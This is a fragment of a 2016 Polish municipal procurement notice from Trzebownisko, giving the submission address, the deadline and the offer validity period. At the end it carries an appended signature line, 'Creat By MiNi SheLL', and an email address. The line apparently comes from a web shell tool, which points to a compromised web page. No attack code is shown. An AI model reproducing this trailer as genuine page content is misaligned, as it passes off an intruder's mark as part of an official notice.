<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.trzebownisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Trzebownisko, 36 - 001 Trzebownisko 976.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2016 godzina 09:00, miejsce: Urząd Gminy Trzebownisko, 36 - 001 Trzebownisko 976 976 - pokój nr 7 (Kancelaria Ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com